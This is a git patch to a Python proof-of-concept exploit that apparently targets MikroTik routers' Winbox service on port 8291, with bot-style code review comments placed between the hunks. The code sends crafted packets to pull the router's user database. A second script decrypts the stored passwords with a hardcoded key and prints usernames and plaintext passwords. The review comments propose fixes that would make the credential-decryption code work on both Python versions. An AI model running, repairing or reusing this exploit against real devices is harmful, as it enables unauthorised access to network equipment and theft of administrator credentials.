From 79ae8a097ec2dd8a4b074c7b76afdb00796720d8 Mon Sep 17 00:00:00 2001 From: Rennan Cockles Date: Mon, 6 Aug 2018 12:28:54 -0300 Subject: [PATCH] PEP-8, python2 compatible and fix in decrypt_password function --- WinboxExploit.py | 59 ++++++++++++++++++++++++------------------------ extract_user.py | 23 +++++++++++-------- 2 files changed, 44 insertions(+), 38 deletions(-) diff --git a/WinboxExploit.py b/WinboxExploit.py index 3d7487b..2b6b9a7 100644 --- a/WinboxExploit.py +++ b/WinboxExploit.py @@ -30,33 +30,34 @@ 0x00, 0x02, 0x00, 0x00, 0x00] - if __name__ == "__main__": - try: - ip = sys.argv[1] - except: - print("Usage: python PoC.py [IP_ADDRESS]") - - #Initialize Socket - s = socket.socket() - s.settimeout(3) - s.connect((ip, 8291)) - - #Convert to bytearray for manipulation - a = bytearray(a) - b = bytearray(b) - - #Send hello and recieve the sesison id - s.send(a) - d = bytearray(s.recv(1024)) - - #Replace the session id in template - b[19] = d[38] - - #Send the edited response - s.send(b) - d = bytearray(s.recv(1024)) - - #Get results - print(ip) - dump(d[55:]) \ No newline at end of file + try: + ip = sys.argv[1] + except: + print("Usage: python PoC.py [IP_ADDRESS]") + exit(1) + + #Initialize Socket + s = socket.socket() + s.settimeout(3) + s.connect((ip, 8291)) + + #Convert to bytearray for manipulation + a = bytearray(a) + b = bytearray(b) + + #Send hello and recieve the sesison id + s.send(a) + d = bytearray(s.recv(1024)) + + #Replace the session id in template + b[19] = d[38] + + #Send the edited response + s.send(b) + d = bytearray(s.recv(1024)) + + #Get results + print("IP: %s" % ip) + print('') + dump(d[55:]) diff --git a/extract_user.py b/extract_user.py index 3b871f5..4a570a3 100644 --- a/extract_user.py +++ b/extract_user.py 
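Review bot: In WinboxExploit.py the argument check still uses a bare `except:`, which also catches KeyboardInterrupt and SystemExit; `except IndexError:` is the only failure `sys.argv[1]` can produce here. The added `exit(1)` relies on the helper injected by the `site` module, which is missing under `python -S` and in frozen builds, so `sys.exit(1)` is the safer call (the file evidently imports `sys` above the hunk, since `sys.argv` is used). The usage string still names `PoC.py` although the file is `WinboxExploit.py`.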
@@ -1,16 +1,19 @@ #!/usr/bin/env python3 -import sys, hashlib +import sys +import hashlib + def decrypt_password(user, pass_enc): key = hashlib.md5(user + b"283i4jfkai3389").digest() passw = "" for i in range(0, len(pass_enc)): - passw += chr(pass_enc[i] ^ key[i % len(key)]) - + passw += chr(pass_enc[i] ^ ord(key[i % len(key)])) + return passw.split("\x00")[0] + def extract_user_pass_from_entry(entry): user_data = entry.split(b"\x01\x00\x00\x21")[1] pass_data = entry.split(b"\x11\x00\x00\x21")[1] @@ -23,8 +26,8 @@ def extract_user_pass_from_entry(entry): return username, password -def get_pair(data): +def get_pair(data): user_list = [] entries = data.split(b"M2")[1:] @@ -35,18 +38,20 @@ def get_pair(data): continue pass_plain = decrypt_password(user, pass_encrypted) - user = user.decode("ascii") + user = user.decode("ascii") user_list.append((user, pass_plain)) return user_list + def dump(data): user_pass = get_pair(data) for u, p in user_pass: - print("User:", u) - print("Pass:", p) - print() + print("User: %s" % u) + print("Pass: %s" % p) + print('') + if __name__ == "__main__": if len(sys.argv) == 2: @@ -55,7 +60,7 @@ def dump(data): else: user_file = open(sys.argv[1], "rb").read() dump(user_file) - + else: print("Usage:") print("\tFrom file: \t", sys.argv[0], "user.dat")
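Review bot: The added `ord(key[i % len(key)])` in `decrypt_password` raises TypeError on Python 3, because indexing the bytes returned by `digest()` already yields an int, while the shebang kept at the top of this hunk still says `python3`. Normalising both operands once works on either interpreter: `key = bytearray(hashlib.md5(user + b"283i4jfkai3389").digest())` and `pass_enc = bytearray(pass_enc)`, after which the original `chr(pass_enc[i] ^ key[i % len(key)])` can stay. A docstring would also help readers: it could state that the stored value is only XOR-masked with an MD5 of the username and a fixed string, so every password in an exposed user database should be treated as disclosed and rotated.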
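Review bot: The single-argument form `print("User: %s" % u)` is applied only in `dump`; the usage block shown as context in the last hunk keeps multi-argument calls such as `print("\tFrom file: \t", sys.argv[0], "user.dat")`, which Python 2 prints as a tuple. Adding `from __future__ import print_function` at the top of the module would make every print call behave the same on both interpreters and would let the original `print("User:", u)` calls stay unchanged. The usage block continues past the end of the visible hunk, so any further print calls there need the same check.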